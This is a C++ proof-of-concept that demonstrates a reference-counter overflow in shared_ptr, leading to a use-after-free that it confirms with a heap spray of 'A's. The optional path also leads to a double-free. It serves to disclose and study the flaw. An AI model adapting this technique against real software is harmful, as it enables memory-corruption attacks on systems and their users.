#include <iostream>
#include <string.h>
#include <vector>


//#define HAS_ENOUGH_MEMORY
//#define BOOST


#include <boost/shared_ptr.hpp>
template<class T> using shared_ptr = boost::shared_ptr<T>;


/*
  The shared_ptr in the new C++11 standard uses a 32 bit value to
  store the number of references to an object, at least in gcc's
  implementation. Moreover, the library does not check this reference
  counter for overflows.

  On a 64 bit system, it is possible to allocate (2^32) *
  sizeof(shared_ptr) pointers to the shared object, leading to an
  overflow of the reference counter. This merely requires that an
  attacker can add and remove references to the object at her liking.

  When one of the shared pointers then goes out of scope, the resource
  is freed and all other references to it are dangling.

  - Machine has over 4G * 16 bytes of RAM
  - Attacker controls the number of references to an object, e.g.,
    she can create state-objects pointing to a shared resource.
  - The attacker can make one of these shared pointers go out of
    scope, e.g., by instructing the system to remove a state object.
*/



/**
   In this example, we hold shared pointers to MyClass.
*/

class MyClass
{
public:
	// The field 'x' is only present to show that we
	// can actually cause a use-after-free and the free'd
	// memory contains attacker-controlled values.

	int x;

	MyClass(int anX){ x = anX; }

	~MyClass()
	{
		std::cout << "   destruct: " << (void *) this << std::endl;
	}
};

int main()
{
	std::cout << "1) Create an object and pass it over to a shared pointer..." << std::endl;
	// We initialize the object on the heap and set x to 10.
	shared_ptr<MyClass> ptr(new MyClass(10));
	std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
	// use-count is 1

	const size_t numPtrs = (size_t) 0xFFFFFFFF;
#ifdef HAS_ENOUGH_MEMORY
	std::cout << "2) Create 0x" << std::hex << numPtrs << " more references to that object..." << std::endl;
	std::vector<shared_ptr<MyClass>> v(numPtrs);

	for (size_t i = 0; i < numPtrs; i++)
	{
		v[i] = ptr;
	}
	std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
	// use-count is 0


	std::cout << "3) Create one more reference..." << std::endl;
	{
		shared_ptr<MyClass> ptr2 = ptr;
		std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
		// use-count is 1

		std::cout << "4) That last reference goes out of scope again now..." << std::endl;
	}
#else
	{
		std::cout << "2) Create an extra reference to that object..." << std::endl;
		shared_ptr<MyClass> ptr2 = ptr;
		std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
		// use-count is 2

		std::cout << "3) Emulate 0x" << std::hex << numPtrs << " more references to that object..." << std::endl;
		for(size_t i = 0; i < numPtrs; i++){
			memset(&ptr, '\0', sizeof(shared_ptr<MyClass>));
			ptr = ptr2;
		}
		std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
		// use-count is 1

		std::cout << "4) One reference goes out of scope again now..." << std::endl;
	}
#endif
	std::cout << "   ptr.use_count() -> " << ptr.use_count() << std::endl;
	// use-count is 0

	std::cout << "5) We now spray the heap with 'A's to overwrite the freed memory" << std::endl;
	for(int i = 0; i < 1000; i++){
		char *foo = new char[4];
		memset(foo, 'A', 4);
	}

	// The address stored in ptr is still that of the free'd object
	std::cout << "   ptr: " << (void *) ptr.get() << std::endl;

	// ptr->x is now 0x41414141
	std::cout << "   value: " << std::hex << ptr->x << std::endl;


	std::cout << "*) Bye!" << std::endl;

#ifdef HAS_ENOUGH_MEMORY
	v.clear();
	std::cout << std::endl;
	std::cout << "Destroying the last reference causes a double-free of the object..." << std::endl;
#endif
	return 0;
}
